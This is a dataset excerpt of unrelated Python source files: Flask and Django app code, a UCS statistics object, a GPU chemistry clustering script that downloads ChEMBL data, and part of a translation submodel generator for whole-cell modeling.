content
stringlengths 5
1.05M
|
|---|
import json
import pytest
from app import app
@pytest.fixture
def client():
    """Provide a Flask test client for the application under test."""
    test_client = app.test_client()
    return test_client
def test_response_success(client):
    """GET /0 returns the number spelled out in words."""
    response = client.get('/0')
    payload = json.loads(response.data)
    assert payload == {'extenso': 'zero'}
def test_response_error(client):
    """GET with an out-of-range number returns the error payload."""
    response = client.get('/1000000')
    payload = json.loads(response.data)
    assert payload == {"message": "Number out of range"}
|
# From https://stackoverflow.com/a/31736883
from config.config import IS_WINDOWS
if (IS_WINDOWS == True):
import msvcrt
else:
import sys
import select
import termios
# Courtesy from pokeyrule (https://github.com/pokey)
# Courtesy from pokeyrule (https://github.com/pokey)
class KeyPoller:
    """Context manager for non-blocking single-key polling on stdin.

    On Windows it polls the console via msvcrt. Elsewhere it switches the
    terminal to non-canonical, no-echo mode on entry and restores the saved
    settings on exit.

    Fixes over the original: idiomatic truthiness tests instead of
    ``== True`` / ``== False``, ``__exit__`` parameters no longer shadow the
    ``type`` builtin, and the unused write/error lists from ``select`` are
    discarded explicitly.
    """

    def __enter__(self):
        if not IS_WINDOWS:
            # Save the terminal settings so __exit__ can restore them.
            self.fd = sys.stdin.fileno()
            self.new_term = termios.tcgetattr(self.fd)
            self.old_term = termios.tcgetattr(self.fd)
            # New terminal setting: unbuffered reads with no echo.
            self.new_term[3] = (self.new_term[3] & ~termios.ICANON & ~termios.ECHO)
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.new_term)
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        if not IS_WINDOWS:
            # Restore the original terminal settings.
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old_term)

    def poll(self):
        """Return one pending character from stdin, or None if none is waiting."""
        if IS_WINDOWS:
            if msvcrt.kbhit():
                return msvcrt.getch().decode()
        else:
            # Zero timeout: check readability without blocking.
            readable, _, _ = select.select([sys.stdin], [], [], 0)
            if readable:
                return sys.stdin.read(1)
        return None
|
import numpy as np
def split_by_timestamp(df_all, col="timestamp", perc=90):
    """Split a DataFrame into train/validation sets at a time-column percentile.

    Bug fix: the split point was previously computed from the hard-coded
    ``df_all.timestamp`` attribute, silently ignoring the ``col`` argument;
    it now uses ``df_all[col]``.

    Args:
        df_all: DataFrame containing the time column.
        col: name of the column to split on (default ``"timestamp"``).
        perc: percentile (0-100) used as the split point. Rows at or below
            the split value go to train, the rest to validation.

    Returns:
        tuple ``(df_train, df_val)`` of DataFrame selections.
    """
    split_value = np.percentile(df_all[col], perc)
    df_train = df_all[df_all[col] <= split_value]
    df_val = df_all[df_all[col] > split_value]
    return df_train, df_val
|
"""
Analysis of scenes (features, or parts of segmented images).
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import absolute_import
__version__ = "$Revision$"
from .em_lm_correlation import EmLmCorrelation
from .neighborhood import Neighborhood
from .cleft_regions import CleftRegions
from .segmentation_analysis import SegmentationAnalysis
from .multi_cluster import MultiCluster
# Not good because it makes pyto.scene.test a method, so importing
# pyto.scene.test.common doesn't work
#import test
#from numpy.testing import Tester
#test = Tester().test
|
"""Tasks related to creation of notifications"""
from . import slack
__all__ = ["slack"]
|
from django.db import models
class VesselManager(object):
    """Factory helper that validates input and persists Vessel rows."""

    def create(self, code):
        """Create and save a Vessel; ``code`` must be non-empty."""
        if not code:
            raise ValueError("Vessel code can't be empty")
        new_vessel = Vessel(code=code)
        new_vessel.save()
        return new_vessel
class EquipmentManager(object):
    """Factory helper that validates input and persists Equipment rows."""

    def create(self, code, name, location, vessel_code, status='active'):
        """Create and save an Equipment record; all fields but status are required."""
        required = (
            (code, "Equipment code can't be empty"),
            (name, "Equipment name can't be empty"),
            (location, "Equipment location can't be empty"),
            (vessel_code, "Equipment vessel_code can't be empty"),
        )
        for value, message in required:
            if not value:
                raise ValueError(message)
        record = Equipment(code=code, name=name, vessel_code=vessel_code,
                           location=location, status=status)
        record.save()
        return record
# Create your models here.
class Vessel(models.Model):
    """A vessel, identified by a unique code."""
    # Unique business identifier; also used as the display string.
    code = models.CharField(max_length=200, unique=True)

    def __str__(self):
        return self.code
class Equipment(models.Model):
    """A piece of equipment, identified by a unique code.

    ``vessel_code`` is stored as a plain string rather than a foreign key
    to ``Vessel`` — presumably intentional; confirm before changing.
    """
    code = models.CharField(max_length=200, unique=True)
    name = models.CharField(max_length=200)
    vessel_code = models.CharField(max_length=200)
    location = models.CharField(max_length=200)
    status = models.CharField(max_length=200, default='active')

    def __str__(self):
        # Added for consistency with Vessel.__str__: display the unique code.
        return self.code
|
"""This module contains the general information for StorageHddMotherBoardTempStats ManagedObject."""
from ...ucscmo import ManagedObject
from ...ucsccoremeta import UcscVersion, MoPropertyMeta, MoMeta
from ...ucscmeta import VersionMeta
class StorageHddMotherBoardTempStatsConsts():
    """Constant values for StorageHddMotherBoardTempStats properties.

    The ``*_NOT_APPLICABLE`` constants are the sentinel string reported
    when a temperature reading is unavailable; the ``SUSPECT_*`` constants
    are the allowed values of the ``suspect`` property.
    """
    LEFT_INLET_TEMP_NOT_APPLICABLE = "not-applicable"
    LEFT_INLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
    LEFT_INLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
    LEFT_INLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
    LEFT_OUTLET_TEMP_NOT_APPLICABLE = "not-applicable"
    LEFT_OUTLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
    LEFT_OUTLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
    LEFT_OUTLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
    RIGHT_INLET_TEMP_NOT_APPLICABLE = "not-applicable"
    RIGHT_INLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
    RIGHT_INLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
    RIGHT_INLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
    RIGHT_OUTLET_TEMP_NOT_APPLICABLE = "not-applicable"
    RIGHT_OUTLET_TEMP_AVG_NOT_APPLICABLE = "not-applicable"
    RIGHT_OUTLET_TEMP_MAX_NOT_APPLICABLE = "not-applicable"
    RIGHT_OUTLET_TEMP_MIN_NOT_APPLICABLE = "not-applicable"
    SUSPECT_FALSE = "false"
    SUSPECT_NO = "no"
    SUSPECT_TRUE = "true"
    SUSPECT_YES = "yes"
class StorageHddMotherBoardTempStats(ManagedObject):
    """Managed object for HDD motherboard temperature statistics.

    Exposes left/right inlet and outlet temperature readings together with
    their min/max/avg aggregates. The object is marked "OutputOnly" in its
    metadata; most properties are READ_ONLY, with ``status`` READ_WRITE.
    """
    consts = StorageHddMotherBoardTempStatsConsts()
    naming_props = set([])

    # Class-level metadata: class id, XML tag, rn prefix, minimum version,
    # access, mask, child classes, access privileges, and parent classes.
    mo_meta = MoMeta("StorageHddMotherBoardTempStats", "storageHddMotherBoardTempStats", "hdd-mobo-temp-stats", VersionMeta.Version151a, "OutputOnly", 0xf, [], ["admin", "operations", "read-only"], [], [u'storageHddMotherBoardTempStatsHist'], [None])

    # Per-property metadata keyed by the Python-side attribute name.
    prop_meta = {
        "child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version151a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
        "dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
        "intervals": MoPropertyMeta("intervals", "intervals", "uint", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
        "left_inlet_temp": MoPropertyMeta("left_inlet_temp", "leftInletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_inlet_temp_avg": MoPropertyMeta("left_inlet_temp_avg", "leftInletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_inlet_temp_max": MoPropertyMeta("left_inlet_temp_max", "leftInletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_inlet_temp_min": MoPropertyMeta("left_inlet_temp_min", "leftInletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_outlet_temp": MoPropertyMeta("left_outlet_temp", "leftOutletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_outlet_temp_avg": MoPropertyMeta("left_outlet_temp_avg", "leftOutletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_outlet_temp_max": MoPropertyMeta("left_outlet_temp_max", "leftOutletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "left_outlet_temp_min": MoPropertyMeta("left_outlet_temp_min", "leftOutletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "normalized_time_col": MoPropertyMeta("normalized_time_col", "normalizedTimeCol", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [], []),
        "right_inlet_temp": MoPropertyMeta("right_inlet_temp", "rightInletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_inlet_temp_avg": MoPropertyMeta("right_inlet_temp_avg", "rightInletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_inlet_temp_max": MoPropertyMeta("right_inlet_temp_max", "rightInletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_inlet_temp_min": MoPropertyMeta("right_inlet_temp_min", "rightInletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_outlet_temp": MoPropertyMeta("right_outlet_temp", "rightOutletTemp", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_outlet_temp_avg": MoPropertyMeta("right_outlet_temp_avg", "rightOutletTempAvg", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_outlet_temp_max": MoPropertyMeta("right_outlet_temp_max", "rightOutletTempMax", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "right_outlet_temp_min": MoPropertyMeta("right_outlet_temp_min", "rightOutletTempMin", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["not-applicable"], ["0-4294967295"]),
        "rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
        "stats_reported": MoPropertyMeta("stats_reported", "statsReported", "int", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
        "status": MoPropertyMeta("status", "status", "string", VersionMeta.Version151a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
        "suspect": MoPropertyMeta("suspect", "suspect", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["false", "no", "true", "yes"], []),
        "thresholded": MoPropertyMeta("thresholded", "thresholded", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
        "time_collected": MoPropertyMeta("time_collected", "timeCollected", "string", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [], []),
        "update": MoPropertyMeta("update", "update", "uint", VersionMeta.Version151a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
    }

    # Map from XML attribute names to Python-side attribute names.
    prop_map = {
        "childAction": "child_action",
        "dn": "dn",
        "intervals": "intervals",
        "leftInletTemp": "left_inlet_temp",
        "leftInletTempAvg": "left_inlet_temp_avg",
        "leftInletTempMax": "left_inlet_temp_max",
        "leftInletTempMin": "left_inlet_temp_min",
        "leftOutletTemp": "left_outlet_temp",
        "leftOutletTempAvg": "left_outlet_temp_avg",
        "leftOutletTempMax": "left_outlet_temp_max",
        "leftOutletTempMin": "left_outlet_temp_min",
        "normalizedTimeCol": "normalized_time_col",
        "rightInletTemp": "right_inlet_temp",
        "rightInletTempAvg": "right_inlet_temp_avg",
        "rightInletTempMax": "right_inlet_temp_max",
        "rightInletTempMin": "right_inlet_temp_min",
        "rightOutletTemp": "right_outlet_temp",
        "rightOutletTempAvg": "right_outlet_temp_avg",
        "rightOutletTempMax": "right_outlet_temp_max",
        "rightOutletTempMin": "right_outlet_temp_min",
        "rn": "rn",
        "statsReported": "stats_reported",
        "status": "status",
        "suspect": "suspect",
        "thresholded": "thresholded",
        "timeCollected": "time_collected",
        "update": "update",
    }

    def __init__(self, parent_mo_or_dn, **kwargs):
        """Initialize all stat attributes to None; ManagedObject applies kwargs."""
        self._dirty_mask = 0
        self.child_action = None
        self.intervals = None
        self.left_inlet_temp = None
        self.left_inlet_temp_avg = None
        self.left_inlet_temp_max = None
        self.left_inlet_temp_min = None
        self.left_outlet_temp = None
        self.left_outlet_temp_avg = None
        self.left_outlet_temp_max = None
        self.left_outlet_temp_min = None
        self.normalized_time_col = None
        self.right_inlet_temp = None
        self.right_inlet_temp_avg = None
        self.right_inlet_temp_max = None
        self.right_inlet_temp_min = None
        self.right_outlet_temp = None
        self.right_outlet_temp_avg = None
        self.right_outlet_temp_max = None
        self.right_outlet_temp_min = None
        self.stats_reported = None
        self.status = None
        self.suspect = None
        self.thresholded = None
        self.time_collected = None
        self.update = None
        ManagedObject.__init__(self, "StorageHddMotherBoardTempStats", parent_mo_or_dn, **kwargs)
|
import configparser
from datetime import datetime
from fellowcrm import db
from flask_login import current_user
import json
# Parse the module's ini configuration. Note: `config` is not referenced
# again in this module's visible code.
# NOTE(review): 'acitivities.ini' looks like a typo of 'activities.ini' —
# confirm against the actual file name on disk before changing.
config = configparser.ConfigParser()
config.read('acitivities.ini')
class Activity(db.Model):
    """SQLAlchemy model for a CRM activity record."""
    id = db.Column(db.Integer, db.Sequence('activity_id_seq'), primary_key=True)
    # Type of this activity and of the record it is attached to
    # (semantics not visible here — confirm against callers).
    typ = db.Column(db.String(100))
    parent_typ = db.Column(db.String(100))
    name = db.Column(db.String(100))
    parent_name = db.Column(db.String(100))
    priority = db.Column(db.String(50))
    status = db.Column(db.String(50))
    description = db.Column(db.Text)
    # Scheduling timestamps.
    date_due = db.Column(db.DateTime)
    date_start = db.Column(db.DateTime)
    date_created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
    # NOTE(review): nullable=False with only onupdate (no default) means the
    # initial INSERT supplies no value for date_modified — confirm intended.
    date_modified = db.Column(db.DateTime, nullable=False, onupdate=datetime.utcnow)

    def __repr__(self):
        return f"Activity('{self.name}')"
|
#!/opt/conda/envs/rapids/bin/python3
#
# Copyright 2020 NVIDIA Corporation
# SPDX-License-Identifier: Apache-2.0
import os, wget, gzip
import hashlib
import logging
from datetime import datetime
from dask.distributed import Client, LocalCluster
import dask_cudf
import dask.bag as db
import cudf, cuml
import pandas as pd
import numpy as np
import sklearn.cluster
import sklearn.decomposition
import umap
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from chembl_webresource_client.new_client import new_client
from chembl_webresource_client.utils import utils
from PIL import Image
import chemvisualize
# Module-wide logging configuration.
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger('nvChemViz')
# NOTE(review): this formatter is created but never attached to a handler in
# the visible code — presumably intended for basicConfig(format=...); confirm.
formatter = logging.Formatter(
    '%(asctime)s %(name)s [%(levelname)s]: %(message)s')
###############################################################################
#
# function defs: np2cudf
#
###############################################################################
def np2dataframe(df, enable_gpu):
    """Convert a 2-D numpy array into a dataframe with columns fea0..feaN-1.

    Returns a pandas DataFrame, or a cuDF DataFrame when enable_gpu is true.
    """
    n_features = df.shape[1]
    frame = pd.DataFrame({'fea%d' % idx: df[:, idx] for idx in range(n_features)})
    if enable_gpu:
        return cudf.DataFrame(frame)
    return frame
def MorganFromSmiles(smiles, radius=2, nBits=512):
    """Compute a Morgan fingerprint bit vector for a SMILES string.

    Returns the fingerprint as a numpy array of length nBits.
    """
    mol = Chem.MolFromSmiles(smiles)
    bit_vector = AllChem.GetMorganFingerprintAsBitVect(mol, radius=radius, nBits=nBits)
    return np.array(bit_vector)
def ToNpArray(fingerprints):
    """Coerce a fingerprint collection into a float32 numpy array."""
    return np.asarray(fingerprints, dtype=np.float32)
###############################################################################
#
# Download SMILES from FTP
#
###############################################################################
def dl_chemreps(chemreps_local_path='/data/chembl_26_chemreps.txt.gz', max_attempts=3):
    """Ensure the ChEMBL 26 chemreps file exists locally with the expected SHA256.

    Downloads the file from the EBI FTP server when it is missing or its
    checksum does not match. The original implementation looped forever on a
    persistently bad download; this version retries at most ``max_attempts``
    times (backward-compatible new parameter) and then fails loudly.

    Args:
        chemreps_local_path: destination path of the gzipped chemreps file.
        max_attempts: maximum number of download attempts before giving up.

    Raises:
        RuntimeError: if a checksum-verified copy cannot be obtained.
    """
    chemreps_url = 'ftp://ftp.ebi.ac.uk/pub/databases/chembl/ChEMBLdb/releases/chembl_26/chembl_26_chemreps.txt.gz'
    chemreps_sha256 = '0585b113959592453c2e1bb6f63f2fc9d5dd34be8f96a3a3b3f80e78d5dbe1bd'

    def _is_good():
        # True when the file exists and its SHA256 matches the expected value.
        if not os.path.exists(chemreps_local_path):
            return False
        with open(chemreps_local_path, 'rb') as file:
            return hashlib.sha256(file.read()).hexdigest() == chemreps_sha256

    for _ in range(max_attempts):
        if _is_good():
            logger.info('chembl chemreps file found locally, SHA256 matches')
            return
        logger.info('downloading chembl chemreps file...')
        wget.download(chemreps_url, chemreps_local_path)
    if _is_good():
        logger.info('chembl chemreps file found locally, SHA256 matches')
        return
    raise RuntimeError(
        'could not obtain a checksum-verified chembl chemreps file after '
        '%d attempts' % max_attempts)
###############################################################################
#
# MAIN
#
###############################################################################
if __name__=='__main__':
    # Start a local dask cluster for parallel fingerprint computation.
    # NOTE(review): 'dash cluster' in the log text looks like a typo for
    # 'dask cluster' (runtime string deliberately left unchanged here).
    logger.info('Starting dash cluster...')
    cluster = LocalCluster(dashboard_address=':9001', n_workers=12)
    client = Client(cluster)

    # Run configuration: GPU path toggle, molecule cap, and PCA width.
    enable_gpu = True
    max_molecule = 10000
    pca_components = 64 # Number of PCA components or False to not use PCA

    # ensure we have data
    dl_chemreps()

    # Read ChEMBL IDs and SMILES from the gzipped chemreps file, capped at
    # max_molecule entries.
    smiles_list = []
    chemblID_list = []
    count=1
    chemreps_local_path = '/data/chembl_26_chemreps.txt.gz'
    with gzip.open(chemreps_local_path, 'rb') as fp:
        # Skip the header line.
        fp.__next__()
        for i,line in enumerate(fp):
            fields = line.split()
            chemblID_list.append(fields[0].decode("utf-8"))
            smiles_list.append(fields[1].decode("utf-8"))
            count+=1
            if count>max_molecule:
                break

    logger.info('Initializing Morgan fingerprints...')
    # Compute Morgan fingerprints in parallel with dask.bag, then stack into
    # a single (n_mols, nBits) float32 array.
    results = db.from_sequence(smiles_list).map(MorganFromSmiles).compute()
    np_fingerprints = np.stack(results).astype(np.float32)

    # take np.array shape (n_mols, nBits) for GPU DataFrame
    df_fingerprints = np2dataframe(np_fingerprints, enable_gpu)

    # prepare one set of clusters
    if pca_components:
        # Reduce fingerprint dimensionality before clustering.
        task_start_time = datetime.now()
        if enable_gpu:
            pca = cuml.PCA(n_components=pca_components)
        else:
            pca = sklearn.decomposition.PCA(n_components=pca_components)
        df_fingerprints = pca.fit_transform(df_fingerprints)
        print('Runtime PCA time (hh:mm:ss.ms) {}'.format(
            datetime.now() - task_start_time))
    else:
        pca = False
        print('PCA has been skipped')

    # KMeans clustering of the (possibly PCA-reduced) fingerprints.
    task_start_time = datetime.now()
    n_clusters = 7
    if enable_gpu:
        kmeans_float = cuml.KMeans(n_clusters=n_clusters)
    else:
        kmeans_float = sklearn.cluster.KMeans(n_clusters=n_clusters)
    kmeans_float.fit(df_fingerprints)
    print('Runtime Kmeans time (hh:mm:ss.ms) {}'.format(
        datetime.now() - task_start_time))

    # UMAP
    # NOTE(review): the assignment below rebinds the imported `umap` module
    # name to a model instance; this works at module scope but is confusing —
    # confirm before refactoring into a function (it would raise
    # UnboundLocalError there).
    task_start_time = datetime.now()
    if enable_gpu:
        umap = cuml.UMAP(n_neighbors=100,
                a=1.0,
                b=1.0,
                learning_rate=1.0)
    else:
        umap = umap.UMAP()
    Xt = umap.fit_transform(df_fingerprints)
    print('Runtime UMAP time (hh:mm:ss.ms) {}'.format(
        datetime.now() - task_start_time))

    # Attach the 2-D embedding and cluster labels; cuDF and pandas use
    # different column-insertion APIs.
    if enable_gpu:
        df_fingerprints.add_column('x', Xt[0].to_array())
        df_fingerprints.add_column('y', Xt[1].to_array())
        df_fingerprints.add_column('cluster', kmeans_float.labels_)
    else:
        df_fingerprints['x'] = Xt[:,0]
        df_fingerprints['y'] = Xt[:,1]
        df_fingerprints['cluster'] = kmeans_float.labels_

    # start dash
    v = chemvisualize.ChemVisualization(
        df_fingerprints.copy(), n_clusters, chemblID_list,
        enable_gpu=enable_gpu, pca_model=pca)
    # NOTE(review): server binds plain HTTP on 0.0.0.0:5000; the 'https' in
    # the log message below may be misleading — confirm.
    logger.info('navigate to https://localhost:5000')
    v.start('0.0.0.0')
|
""" Generator for translation, protein folding and translocation submodel for eukaryotes
:Author: Yin Hoon Chew <yinhoon.chew@mssm.edu>
:Date: 2019-06-14
:Copyright: 2019, Karr Lab
:License: MIT
"""
from wc_onto import onto as wc_ontology
from wc_utils.util.units import unit_registry
import wc_model_gen.global_vars as gvar
import wc_model_gen.utils as utils
import Bio.Alphabet
import Bio.Seq
import math
import numpy
import scipy.constants
import wc_kb
import wc_lang
import wc_model_gen
# Map from tRNA anticodon (written in the DNA alphabet, hence T rather than U)
# to the list of codons (DNA triplets) it can recognize. Entries marked
# "natural pairing but unlikely" extend the table with exact complements not
# covered by the main recognition rule.
ANTICODON_CODON_RECOGNITION_RULES = {
    'GAA': ['TTT', 'TTC'],
    'TAA': ['TTA', 'TTG'],
    'CAA': ['TTG'],
    'AGA': ['TCT', 'TCC', 'TCA'],
    'GGA': ['TCT', 'TCC'],
    'TGA': ['TCA', 'TCG'],
    'CGA': ['TCG'],
    'GTA': ['TAT', 'TAC'],
    'GCA': ['TGT', 'TGC'],
    'CCA': ['TGG'],
    'AAG': ['CTT', 'CTC', 'CTA'],
    'GAG': ['CTT', 'CTC'],
    'TAG': ['CTA', 'CTG'],
    'CAG': ['CTG'],
    'AGG': ['CCT', 'CCC', 'CCA'],
    'GGG': ['CCT', 'CCC'],
    'TGG': ['CCA', 'CCG'],
    'CGG': ['CCG'],
    'GTG': ['CAT', 'CAC'],
    'TTG': ['CAA', 'CAG'],
    'CTG': ['CAG'],
    'ACG': ['CGT', 'CGC', 'CGA'],
    'GCG': ['CGT', 'CGC'],
    'TCG': ['CGA', 'CGG'],
    'CCG': ['CGG'],
    'AAT': ['ATT', 'ATC', 'ATA'],
    'GAT': ['ATT', 'ATC', 'ATA'],
    'TAT': ['ATA'],
    'CAT': ['ATG'],
    'AGT': ['ACT', 'ACC', 'ACA'],
    'GGT': ['ACT', 'ACC'],
    'TGT': ['ACA', 'ACG'],
    'CGT': ['ACG'],
    'GTT': ['AAT', 'AAC'],
    'TTT': ['AAA', 'AAG'],
    'CTT': ['AAG'],
    'GCT': ['AGT', 'AGC'],
    'TCT': ['AGA', 'AGG'],
    'CCT': ['AGG'],
    'AAC': ['GTT', 'GTC', 'GTA'],
    'GAC': ['GTT', 'GTC'],
    'TAC': ['GTA', 'GTG'],
    'CAC': ['GTG'],
    'AGC': ['GCT', 'GCC', 'GCA'],
    'GGC': ['GCT', 'GCC'],
    'TGC': ['GCA', 'GCG'],
    'CGC': ['GCG'],
    'GTC': ['GAT', 'GAC'],
    'TTC': ['GAA', 'GAG'],
    'CTC': ['GAG'],
    'ACC': ['GGT', 'GGC', 'GGA'],
    'GCC': ['GGT', 'GGC'],
    'TCC': ['GGA', 'GGG'],
    'CCC': ['GGG'],
    'TCA': ['TGA'], #selenocysteine
    'AAA': ['TTT'], #natural pairing but unlikely according to the rule
    'ATA': ['TAT'], #natural pairing but unlikely according to the rule
    'ACA': ['TGT'], #natural pairing but unlikely according to the rule
    'ATG': ['CAT'], #natural pairing but unlikely according to the rule
    'ATT': ['AAT'], #natural pairing but unlikely according to the rule
    'ACT': ['AGT'], #natural pairing but unlikely according to the rule
    'ATC': ['GAT'], #natural pairing but unlikely according to the rule
    }
# Codons that always terminate translation.
UNCONDITIONAL_STOP_CODON = ['TAA', 'TAG']
# TGA terminates translation except where it encodes selenocysteine
# (see the 'TCA' entry above and the selenoproteome option).
CONDITIONAL_STOP_CODON = ['TGA']
class TranslationTranslocationSubmodelGenerator(wc_model_gen.SubmodelGenerator):
""" Generator for translation, protein folding and translocation submodel
Translation, protein folding and translocation processes are
modeled as three reaction steps in this submodel:
1. Translation initiation where ribosomes and methionine (or other start amino acid)
bind to the mRNA. For nuclear mRNAs, transport from the nucleus to the cytoplasm
are lumped with this reaction. The energetic of met-tRNA charging is included;
2. Translation elongation and termination are lumped into one reaction that produces
nascent polypeptides. The energetic of amino-acid-tRNA charging is included;
3. Protein folding and translocation to each organelle/compartment are lumped into
one reaction
Options:
* cytoplasmic_ribosome (:obj:`str`): name of cytoplasmic ribosome
* mitochondrial_ribosome (:obj:`str`): name of mitochondrial ribosome
* cytoplasmic_initiation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
initiation factors in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_initiation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
initiation factors in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* cytoplasmic_elongation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
elongation factors in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_elongation_factors (:obj:`list` of :obj:`list`): list of lists of the name of
elongation factors in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* cytoplasmic_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the cytoplasm, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the mitochondria, grouped based on similar functions or classes,
the default is an empty list
* er_chaperones (:obj:`list` of :obj:`list`): list of lists of the name of
chaperones in the endoplasmic reticulum, grouped based on similar functions or classes,
the default is an empty list
* mitochondrial_exosome (:obj:`str`): the name of exosome complex that degrades RNAs in
the mitochondria
* amino_acid_id_conversion (:obj:`dict`): a dictionary with amino acid standard ids
as keys and amino acid metabolite ids as values
* codon_table (:obj:`dict`, optional): a dictionary with protein id as key and
NCBI identifier for translation table as value, the default is 1 (standard table)
for all protein
* cds (:obj:`bool`, optional): True indicates the sequences of protein are complete CDS,
the default is True
* beta (:obj:`float`, optional): ratio of Michaelis-Menten constant to substrate
concentration (Km/[S]) for use when estimating Km values, the default value is 1
* polysome_fraction (:obj:`dict`): a dictionary with mRNA ids as keys and
fraction of total cellular ribosomes the mRNA is bound to
* mitochondrial_cytosolic_trna_partition (:obj:`float`, optional): fraction of cellular
tRNA that would be imported into the mitochondrial for codons not covered by the
mitochondrial tRNAs, the default value is 0.01
* selenoproteome (:obj:`list`, optional): list of IDs of genes that translate into
selenoproteins, default is an empty list
"""
def clean_and_validate_options(self):
    """ Apply default options and validate options

    Required options raise ``ValueError`` when missing (same messages as
    before); optional options are filled in with their documented defaults.

    Change: the range check on ``mitochondrial_cytosolic_trna_partition``
    now raises ``ValueError`` instead of using ``assert``, which is
    silently stripped when Python runs with ``-O``.
    """
    options = self.options

    # Required names: fail fast with the original error messages.
    if 'cytoplasmic_ribosome' not in options:
        raise ValueError('The name of cytoplasmic ribosome has not been provided')
    if 'mitochondrial_ribosome' not in options:
        raise ValueError('The name of mitochondrial ribosome has not been provided')

    # Factor/chaperone groupings all default to empty lists.
    for key in ('cytoplasmic_initiation_factors',
                'mitochondrial_initiation_factors',
                'cytoplasmic_elongation_factors',
                'mitochondrial_elongation_factors',
                'cytoplasmic_chaperones',
                'mitochondrial_chaperones',
                'er_chaperones'):
        options[key] = options.get(key, [])

    if 'mitochondrial_exosome' not in options:
        raise ValueError('The name of mitochondrial exosome has not been provided')
    if 'amino_acid_id_conversion' not in options:
        raise ValueError('The dictionary amino_acid_id_conversion has not been provided')

    # Scalar options with documented defaults.
    options['codon_table'] = options.get('codon_table', 1)
    options['cds'] = options.get('cds', True)
    options['beta'] = options.get('beta', 1.)

    if 'polysome_fraction' not in options:
        raise ValueError('The dictionary polysome_fraction has not been provided')

